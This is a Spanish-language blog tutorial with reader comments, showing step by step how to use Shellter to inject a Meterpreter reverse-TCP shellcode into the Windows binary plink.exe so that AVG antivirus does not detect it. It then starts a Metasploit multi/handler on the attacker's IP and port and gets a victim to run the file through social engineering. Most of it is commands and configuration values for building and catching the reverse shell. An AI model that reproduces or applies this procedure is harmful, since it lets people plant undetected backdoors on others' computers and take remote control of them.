Inicio > Debian, Hacking, Linux, Manuales y tutoriales > Evadiendo Antivirus con Shellter y Metasploit

Evadiendo Antivirus con Shellter y Metasploit

shellter

Las técnicas para evación de antivirus son muy diversas y cada vez evolucionan , sin embargo cada cierto tiempo aparecen nuevas técnicas unas mas buenas que otras.

Shellter, es una herramienta de inyección de shell dinámica, según sus autores, probablemente el primero infecta PE dinámico, se puede utilizar para inyectar shells en programas para  Windows basados en 32bits ( programas en 32bits) sin embargo esto no representa una limitante, ya que es muy usual tener Windows a 64bits y tener instalado programas a 32bits.

Shellter aprovecha la estructura original del PE en los archivos y no aplica ninguna modificación, añade una sección extra con RWE , además usa un enfoque dinámico único,  lo cual lo hace imperceptible por los antivirus.

Vamos a ver como es su uso:

1.- ESCENARIO

Kali Linux en la IP 192.168.1.36
Windows 7 con AVG Antivirus en la IP 192.168.1.35

hackingwindows

2.- SETUP
Es necesario descargar shellter desde la pagina https://www.shellterproject.com/download/  en esta caso usaremos la versión 4.0

wget http://www.silcom.com.pe/soft/shellter.zip   ( Sitio alternativo)
unzip shellter.zip
mv shellter /usr/share/

3.- INICIAR SHELLTER
– Vamos a usar el archivo “plink.exe” el cual se ubica en Kali Linux y moverlo a la carpeta donde tenemos shellter .

cp /usr/share/windows-binaries/plink.exe /usr/share/shellter/

shellter
– Luego iniciaremos shellter de la siguiente forma:

wineconsole shellter.exe

shellter

4.- CONFIGURACIÓN DE SHELLTER

– Escojer modo automatico con la opción “A”

shellter

– Luego indicaremos el programa al cual le inyectaremos el shell code el cual es el archivo plink.exe previamente copiado.

PE Targer : plink.exe

shellter

– Luego cuando aparezca la lista de payloads elegir la opción “L”
Use a listed payload or custom: L

shellter
– Luego elegir la opcion “1”
Select payload by index: 1

shellter

– Ahora configuraremos los datos de retorno del shell reverso

set LHOST : 192.168.1.36 ( IP de Kali Linux)
set LPORT : 5555 ( Puertos donde retornará la shell

shellter

– Finalmente si todo salio bien, tendremos un mensaje “Inyection Verified” y luego presionamos “Enter” y finalizaremos shellter.

shellter
Con esto hemos conseguido que el archivo plink.exe esté infectado con el shell reverso.

5.- ACTIVANDO EL HANDLER CON METASPLOIT

– Iniciamos con msfconsole

shellter

– Ahora pondremos a la escucha el handler en el puerto 5555

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.36
set lport 5555
exploit

shellter

6.- AHORA VAMOS AL WINDOWS Y PROBAMOS

– Mediante alguna técnica de ingeniería social ( y de esas hay muchas) conseguimos que el archivo “plink.exe”  sea ejecutado en la víctima.

shellter

– Como podemos ver tenemos una bonita sesión de meterpreter 😀 sin que el antivirus reaccione.

shellter
– Ahora podemos hacer un par de cosas

shellter

shellter

Bueno ya estamos adentro, la herramienta se ve prometedora.

UPTADE 03/2016
Para ejecutar shellter en Kali 2016.1 es necesario correr lo siguiente antes de wineconsole shellter.exe:

dpkg –add-architecture i386 && apt-get update && apt-get install wine32

Espero les sirva
Juan Oliva
@jroliva

Anuncios
  1. gustavo
    julio 25, 2015 de 9:41 pm

    Hola JRoliva necesito saber, perdon si justo no es aca, como configurar elastix 2.5 para acceder con celulares mediante aplicacion Zoiper (local internet funciona) fuera de la local me dice error 408. No tengo telefonoip conectado y tengo internet por enlace (route desconozco).Gracias

    • julio 29, 2015 de 4:31 pm

      Hola Gustavo
      La verdad entiendo muy poco lo que escribiste, si lo detallas y explicas mejor, con todo gusto te recomiendo algo.

      Saludos
      Juan Oliva

  2. julio 26, 2015 de 4:41 pm

    Shellter is also compatible with Windows x64.
    What the documentation says, is that you can only inject into 32-bit executables at the moment.
    32-bit application are compatible with Windows x64…just saying.

    • julio 29, 2015 de 4:22 pm

      KyREcon

      Ok, thanks for the explication, I correct the post

      Regards!!
      Juan Oliva

  3. Viral
    septiembre 20, 2015 de 11:14 pm

    Este metodo puede funcionar si yo coloco el plink.exe en un servidor donde se almacenan carpetas y archivos, y luego acceder al servidor remotamente? ¿es posible?

    • septiembre 21, 2015 de 9:17 pm

      Hola Viral

      El exe puede estar en cualquier lado en realidad, la shell reversa se establecerá mientras la IP y puertos de conexión sean alcanzables.

      Saludos
      Juan Oliva

  4. Dan
    junio 16, 2016 de 1:18 am

    Y con Shellter es posible obtener una macro para luego inyectarla en un documento office malicioso???

    • junio 16, 2016 de 5:43 pm

      No, lo que podrías hacer es infectar el documento en si.
      Saludos
      Juan

      • Dan
        junio 17, 2016 de 6:15 pm

        Pero Shellter solo infecta ejecutables .exe, entonces cómo podría infectar el documento en sí???

  1. julio 31, 2015 de 6:41 pm
  2. julio 31, 2015 de 11:03 pm

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión /  Cambiar )

Google photo

Estás comentando usando tu cuenta de Google. Cerrar sesión /  Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión /  Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión /  Cambiar )

Conectando a %s

A %d blogueros les gusta esto: